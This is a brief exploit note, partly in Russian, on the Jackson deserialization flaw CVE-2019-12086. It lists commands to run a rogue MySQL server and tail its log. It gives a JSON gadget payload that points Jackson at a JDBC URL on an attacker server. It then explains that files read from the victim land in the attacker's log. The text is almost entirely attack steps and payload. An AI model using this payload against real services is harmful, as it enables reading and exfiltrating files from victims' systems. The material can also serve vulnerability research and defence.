
jackson десериализация
CVE-2019-12086 jackson unserialize
python rogue_mysql_server.py
tail -f mysql.log
["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]
После десериализации вредоносной строки JSON, Jackson подключается к вредоносному MySQL-серверу, и содержимое прочитанного файла записывается в mysql.log вредоносного сервера.